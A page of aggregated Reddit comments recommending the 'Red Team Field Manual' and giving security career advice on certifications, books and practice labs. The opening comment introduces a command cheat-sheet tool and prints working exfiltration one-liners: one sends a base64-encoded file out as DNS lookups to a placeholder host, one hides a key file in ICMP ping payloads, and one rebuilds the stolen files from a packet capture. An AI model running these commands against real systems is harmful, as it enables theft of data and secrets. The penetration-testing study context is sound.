We found 30 Reddit comments about Rtfm: Red Team Field Manual. Here are the top ones, ranked by their Reddit score.
Aloha everyone, I would like to introduce a little tool i've been working on : rtfm.py
https://github.com/leostat/rtfm | https://necurity.co.uk/osprog/2017-02-27-RTFM-Pythonized/
The program aims to give you a database of helpful commands, references, cheatsheets and tips in an indexed, easy to search format.
You can search through the database using one or more of; The command, tags, URL's, references, author, date added, or, Comments to get the information you need. At the moment it has around 500 commands in it, and it comes with an updater to allow me to push more content to it from github.
At the moment its not perfect, with the code probably being a tad into the horrendous category, but it works! As a quick example, you may be on a box and wanting to exfil some data, for some odd reason you don't have internet access, but rtfm to the rescue!
12:10:root:rtfm: ./rtfm.py -R exfil
Command ID : 384
Command : for line in base64 -w 62 [file]; do host $line.[hostname]; done
Comment : exfil file through DNS, may want to encrypt, also assuming you have a short domain
Tags : linux,bash,loop,interesting
Date Added : 2017-06-18
Added By : Innes
Command ID : 386
Command : ping -p 11010101010101010101010101010199 -c 1 -M do 127.0.0.1 -s 32; for line in base64 sslfile.key | xxd -p -c 14; do line2=echo "11 $line 99" |tr -d ' '; ping -p $line2 -c 1 -M do 127.0.0.1 -s 32; done; ping -p 11101010101010101010101010101099 -c 1 -M do 127.0.0.1 -s 32
Comment : Exfil over icmp
Tags : linux,networking,loop,interesting
Date Added : 2017-06-18
Added By : Innes
Command ID : 496
Command : for line in $(tshark -r [pcap] -T fields -e data | uniq | grep -v "......................................................" | sed s/.11/11/g | grep "11.99" | sed s/11// | sed s/99$// | tr -d '\n' | sed s/0101010101010101010101010101/'\n'/g |sed s/010101010101010101010101010//g); do echo $line | xxd -r -p | base64 -d;echo +++++++++++++++++++; done
Comment : Convert exfil ICMP back to files from pcap
Tags : linux,networking,loop
Date Added : 2017-06-18
Added By : Innes
Throughout the program I have tried to include references to where the commands have come from, however this has not always been possible. If you spot a missing reference or nod, please let me know and I will add it in!
There are a few bugs in the code i'm aware of, and a couple of things I need to add still but let me know what you think! If you like it, awesome, if you don't then boo. Have a look, and let me know what you think with any suggestions, or if your feeling nice, submit content for the database / suggestions or code to improve the program.
Have a great day all!
base64 -w 62 [file]
base64 sslfile.key | xxd -p -c 14
echo "11 $line 99" |tr -d ' '
Hey man! I work as Security Analyst - about a year away from graduating with my Bachelors.
I suggest you pick up the CompTIA Security+ Certification, as well as start learning the basics of Networks and how they function. Learn ports and protocols, as well as how IDS/IPS/Firewalls function. This will get you an entry level role as a Jr Analyst. I suggest you use [http://www.professormesser.com/security-plus/sy0-401/sy0-401-course-index/](Professor Messers Security+ Videos) This will teach you the basics of security work, networking concepts, threats, etc.
At the same time start listening to podcasts like Paul's Security Weekly, Down the Security Rabbit Hole, etc. As well as start reading blogs on hacking to get a feel for whats done.
Get a home lab and learn a few tools like Wireshark and Nmap for basic Security Analyst work - to learn how packets work, how they are structured, and how to scan pc's for ports and services. At the same time, focus on learning about threats and vulnerabilities (which are covered in security+).
If you want to get into PenTesting then you need a wide range of knowledge. Pick up and learn a few languages (master the basics and understand what the code does and how to read/interpret it). You need to know: PHP, HTML, SQL, Python (or Ruby), and a basic language like C, or Java.
If you want to dig deeper into PenTesting then start reading: https://www.offensive-security.com/metasploit-unleashed/
Good way to get into the Kali Distro and learn how to run Metasploit against vulnerable VM's.
Take a look at https://www.vulnhub.com/resources/ for books, and vulnerable VM's to practice on.
https://www.cybrary.it/ is also a good place with tons of videos on Ethical Hacking, Post Exploitation, Python for Security, Metasploit, etc.
Pick up some books such as
The Hacker Playbook 2: Practical Guide To Penetration Testing
Hacking: The Art of Exploitation
Black Hat Python: Python Programming for Hackers and Pentesters
Rtfm: Red Team Field Manual
The Hackers Playbook and The Art of Exploitation are great resources to get you started and take you step by step on pen testing that will allow you to alter explore the endless possibilities.
Also a good list of resources that you can learn more about security:
Getting Started in Information Security
Overall experience and certification are what will get you into the door faster. Most employers will look for experience, but if they see you have motivation to learn and the drive to do so, then they might take you. Certifications also are big in the infosec field, as they get you past HR. And having a home lab and doing side projects in security also reflects well.
Red Team Field Manual
This is one of my security starter trifecta:
Hacking: The Art of Exploitation
Rtfm: Red Team Field Manual
Blue Team Handbook: Incident Response Edition
Alright for hacking... It's a LOTTT of stuff you'll need to learn, everything from hacking wifi, hacking websites, cracking passwords. But really all a hacker is, is someone who knows the system so well they can exploit and break it.
What kind of people are hackers/pen-testers?
Unless your job title is literately "red-teamer, or pentester" then "hackers" are usually security researchers, white hats, security analysts, hobbyists, people who tinker around. But really all hackers are, are computer nerds who love this stuff, this is what we live for. So just don't do anything stupid and don't do anything illegal.
Here is some of the big areas you'll need to learn:
Networking / Network security
Linux / Windows (https://linuxjourney.com is amazing) I learned a ton by creating my own custom Debian based Linux Disro.
Cryptography / Stenography
Malware / Malware analysis
System hardening / system security
Privacy techniques (Being safe, Tor, Tails, what you share on social media)
Exploiting services, exploiting machines
Wireless attacks (WEP, WPA, WPA2)
Common vulnerabilities, and exploits
How to use google. (Like dorking, Shodan, using online resources)
Maybe some basic python and scripting
Basic security concepts like NIPS, NIDS, SIEMS, mitigation, security policies.
Common ports and services (You can find flashcards on Quizlet)
https://www.youtube.com/watch?v=wBp0Rb-ZJak (The Complete Linux Course: Beginner to Power User)
Also check out
https://www.youtube.com/playlist?list=PLG49S3nxzAnmpdmX7RoTOyuNJQAb-r-gd (Messer, Networking)
https://www.youtube.com/watch?v=vrh0epPAC5w (Animated full Network+ course)
150 dumped full courses for free
Practice the skills you learn with CTF'S (Capture the flag)
Start researching and studying for certifications, COMPTIA, CISCO, REDHAT
The intro/easy certs are
Comptia A+ (Hardware, basic computers stuff, cables and stuff)
Comptia Network+ (Networking, network topologies, types, subnetting, vlans, dmz's)
Comptia Security+ (Malware types, threads, attacks, policies)
A bit hard and better certs
Cisco CCNA Cyber ops
Comptia CYSA+ (Security analyst stuff, the security+ but much more in depth)
Comptia Pentest+ (Pentesting tools, methodology, steps, ect.)
eLeanSecurity eJPT (junior pentesting cert)
ecouncil CEH (Good for DoD jobs, kinda outdated tho, hacking stuff)
Now it gets pretty advanced
Comptia CASP+ (advanced methods, concepts, techniques regarding security)
OCSP (Oooh the cool kinds have this one, pentesting galore < msut have)
Comptia CISSP (HR and people love this one, high level cert)
My recommended pathway is Security+ > Cysa+ > Pentest+ > CEH > CASP+ > OCSP > CISSP
Here is Comptia's recommended pathway .PDF
Start to learn a programming language
Python is highly recommended for people who are looking for a first language because:
It’s easy to learn.
It’s great for scripting.
It can be used for just about anything.
https://www.youtube.com/watch?v=rfscVS0vtbw (4 hour nice intro to Python course)
Depending how deep you go you might need to learn C and or Assembly, both are commonly used for malware analysis, reverse engineering, binary exploitation, and exploit development. This also will require you to learn things like GCC, GDB, IDA, Hopper, and all the fun stuff. But this can be really really hard to learn, but is incredibly rewarding.
I can always recommend the Red team Field manual.
Some nice cheatsheets I have printed out.
Given your background as a programmer, I would recommend starting with SQL exploits. You need to have at least a working knowledge in how programs and script work, and it gives you the framework for understand how to be clever with the existing code logic and how to think outside the box.
If that ends up being too easy or once you get a good handle on that, take a look at metasploit and the exploit database associated with that. Rather than just using the exploits, look at the code and get an idea of how the individual exploits work (which are all the same on the base level: using logic in a creative way the original programmers didn't think of or intend).
As for books, I recommend This One as a primer. It's not exactly up to date, but the theory is sound (giving you a solid foundation on how exploits are made and the thought process behind them).
I really like This One for learning metasploit and getting a further understanding of exploit scripts.
And I just love This Book in general. Once you take a look, you'll see why.
Starter for 10;
That should start the digging of the rabbit hole.
Edit: I should elaborate a bit, I've been purposefully obtuse. What makes a good Security Engineer? Curiosity, wanting to know how things work, understanding how things tick and really get under the hood of what makes those ones and zeros truly shine. If the above two doesn't get your curious and open your eyes to the MASSIVE amount of learning you need to do, as well as the potential rewards/pitfalls/overwhelming feelings, then move along. ;-)
I would stay away from dual booting. It's just a pain in the ass. Install Windows and virtualize (VMware Player/VirtualBox) the Linux environment. If you go with VirtualBox or a pro version of VMware, you have the added benefit of being able to snapshot your environment, muck it up, and roll back to that snapshot.
I use books more for reference than to read through. With that in mind, the single most useful book I own is this: https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
The books mentioned in your other thread and by /u/dreddriver are good and I would like to add RTFM and Malware Analysis: Investigating and Analyzing Malicious Code. The latter is a little dated but still relevant as far as live memory analysis goes, which is the bees knees in modern forensics.
Make sure to ISOLATE and SANDBOX. Download Metasploitable and Ultimate Lamp.
This is a good guide--
Keep up to date on CVE's
And as always, follow security guys on their blogs, Twitter, and whatever. People are super crafty and always coming up with new ideas.
I have RTFM in my bag, but more for the joke than anything. In reality, it has a lot of good stuff in it, across the board.
I usually bookmark a bunch of stuff, but end up re-googling anyway because it's faster than traversing my bookmarks.
Sorry this has taken me so long to get too. Been busy.
First, understand that Kali is nothing mote than a collection of tools. Its those tools that you are actually wanting to learn.
KaliTutorials is one place you can start.
Also, there is an abundance of videos on YouTube and if you are serious about wanting to learn penetration testing/security makes sure you book mark Irongeek
Like I said earlier, by the time books are written, edited, and published, they can often be out of date.
If you do want to understand some of the basics, here are books you should look at:
Metasploit: The Penetration Tester's Guide
Basic Security Testing with Kali Linux 2 I havent read this one but I have heard good things
The Hacker Playbook
[The Hacker Playbook 2] (https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing/dp/1512214566/ref=pd_sim_14_4?_encoding=UTF8&amp;pd_rd_i=1512214566&amp;pd_rd_r=2HDYK8BDM5MR8PV03JG8&amp;pd_rd_w=kiAl7&amp;pd_rd_wg=fAjYi&amp;psc=1&amp;refRID=2HDYK8BDM5MR8PV03JG8)
Also a good list of resources can be found here: cybrary.it
I'd be very surprised if you haven't heard or got these given your certs! Either way highly recommend the Blue Team Field Manual and Red Team Field Manual
Yes, most Gov jobs require at least Sec+.
Depending on how much you did as an LEO you may look into computer forensics. Network Security etc. You may also want to beef up knowledge of networking as well. So either the Net+ and/or CCNE cert.
Books are always a good place to start. I don't know about this one but have read a few other books by this publisher that have been pretty good.
Ones I have read/skimmed:
Correct methodology is to break shit. Ignore the rules and bend them.
Just pay attention to what is in scope. Dont take down a production server etc. Dont snoop 3rd party hosted sites.
>doing in my free time
Do what ever interests you.
Red team field manual.
>participate in bug bounties
The biggest thing is the material they provide. The Red team field manual RTFM helped a ton early on.
I mean the book,, RTFM - https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
Que mas quieres hacer? No saques mas nada Cisco si no estas pendiente de hacer networking y aun asi, Cisco no se esta usando tanto como otros (Palo Alto por ejemplo).
Si quieres hacer Incident Response y Pentest, lanzate estos libros
Tienes que definir un poco mas que quieres hacer. Que te atrae mas de cybser security?
Make your life easier and order this...
I use it for pentesting, but it is a solid small reference book with Linux commands, as well as Windows and others.
You can always grab the O'Reilly Linux book, but this is much more portable and has room for notes.
If you have to use Windows, and many of us do, do yourself a favor and learn some PowerShell. "ls" is a supported alias. In fact, a lot of Unix style commands are. It even uses the pipeline "|" only instead of piping text you are passing .Net objects.
> ps notepad | kill
You don't have to parse out the process id. It derives that from the object.
Do yourself a further favor and install Git. Then you can include all the tools under its usr/bin directory in your path and have such tools as grep, du, find, ssh, scp, etc. all complied for Windows.
The look on a Windows sysadmin's face when you ssh to a remote server from a pwsh command line makes it all worthwhile.
Edit: I mean, I even run vim with a custom vimrc file in a pwsh console on Windows 10 with my keyboard remapped to Dvorack. And GVim is my default tool for .txt files. I get a lot of weird looks from the Windows sysadmins.
Edit #2: If you want some really squirrely but very effective Win cmd style commands, check out the Red Team Field Manual. Some good shit in here for Linux too.
Just tell him to go read the R.T.F.M. book
Red Team Field Manual (edit: for offense)
If you’re want to defend against web attacks, the owasp wiki should be good to get you started.
My recommendations then for self study:
It's actually a thing.
You could find out for only 9$ now on Amazon. but I think pat131 is right though, it looks like an overhyped basic pentesting manual specially designed to extract money from script kiddies pockets. There are certainly better and more up to date resource available for free on the internet.
ps. "pen-tester" is the politically correct term for Hacker
Since this is the subreddit for DFIR, that's what you're going to end up with as far as suggestions go. For pentesting stuff, checkout:
-Web Application Hacker's Handbook: https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470 (this has some labs, but just reading through the various weaknesses in WebApps will be a great start)
-The Hacker Playbook: https://www.amazon.com/dp/1512214566/ref=pd_lpo_sbs_dp_ss_1?pf_rd_p=1944687742&amp;pf_rd_s=lpo-top-stripe-1&amp;pf_rd_t=201&amp;pf_rd_i=1118026470&amp;pf_rd_m=ATVPDKIKX0DER&amp;pf_rd_r=1NSA1RZZ3WQTP374S9WK
Red Team Field Manual: https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=pd_bxgy_14_img_2?ie=UTF8&amp;psc=1&amp;refRID=S7FG8F9TCMZMM9HVX2TN
Those two are good general pentesting books. You might also try /r/AskNetsec for other suggestions.
From what I gather, it has to do with hacking computers. http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=pd_rhf_se_s_cp_4_XYAH?ie=UTF8&amp;refRID=1JBCRB3Q9672J44NKK9A
Appears to be the logo for the Red Team Field Manual. Twitter page here. Amazon link to the book here. This is a reference book for common command line tools used in the security field. Penetration testers would use this, red team / blue team scenario participants, etc.
"Red team" is the common term used for the "bad guys" in security training scenarios. Having a hard copy reference is nice because you are many times operating blind, crafting complex command groups without being able to see the output or reference the man page.
Sure - we are working through this right now along with a lot of supplemental material the teacher has put together himself - the book is fine on its own though.
While you could technically jump straight into this and start messing around with the pen testing applications, I'd strongly recommend working through the book from my original post as you'll have a strong foundation of what you are actually doing and what to do when things go wrong or aren't working exactly right.
We also use this book, however I'd probably not recommend spending the money unless you have worked through both books and really want to get into pen testing. Even then I probably wouldn't recommend it as its just a reference book or "cheat sheet" of popular commands, locations of files like passwords, etc. etc. Its made to be taken out to the field and as a small reference book if you forget something and don't have time for google. We are using it because we are actually doing pen testing in random labs where we walk into a room for the first time and have two hours to exploit various things. Ill link it anyway though just in case:
There is another book we haven't bought but he may have us pick up and if that happens ill link it as well. Hope this all helped and good luck!
edit: I forgot about this - we will be using some of this once we've finished the second book in a few weeks: